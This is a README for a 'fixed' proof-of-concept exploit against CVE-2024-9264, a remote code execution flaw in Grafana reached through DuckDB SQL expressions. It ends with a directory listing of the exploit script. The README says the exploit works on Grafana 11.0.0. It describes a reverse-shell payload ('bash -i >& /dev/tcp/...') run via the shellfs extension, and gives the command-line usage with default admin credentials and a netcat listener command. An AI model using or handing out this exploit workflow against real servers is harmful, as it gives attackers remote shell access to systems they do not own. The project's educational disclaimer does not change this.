# π οΈ CVE-2024-9264 - Fixed Grafana RCE Exploit
This is a **fixed version** of the proof-of-concept exploit for **CVE-2024-9264**, a critical remote code execution vulnerability in Grafana (via SQL expressions and DuckDB).
π Original advisory: [Grafana Security Release](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/)
β Original PoC: Broken due to syntax errors and incorrect use of `write_file()`
β
This version works, tested on a vulnerable Grafana 11.0.0 instance.
---
## β
Fixes in this version
- β
Correctly uses `writefile()` instead of `write_file()` (DuckDB function)
- β
Proper shell payload using `bash -i >& /dev/tcp/...`
- β
Reverse shell written and executed successfully via `shellfs` extension
---
## π¦ Requirements
- Grafana instance with:
- DuckDB backend
- Ability to `install shellfs from community`
- A netcat listener on your attacker machine
---
## π Usage
```bash
python3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
```
Then listen with:
```bash
nc -lvnp 4444
```
---
## β οΈ Legal Disclaimer
This project is **for educational purposes only**.
Do not use it against targets you do not have permission to test.
---
## βοΈ Author of this Fix
Modified and validated by [Exerr](https://github.com/Exerrdev) β original PoC by z3k0sec.
[4.0K] /data/pocs/3652b7b50abb66f58cceda8a6e286568b5583559
βββ [3.2K] fpoc.py
βββ [1.4K] README.md
0 directories, 2 files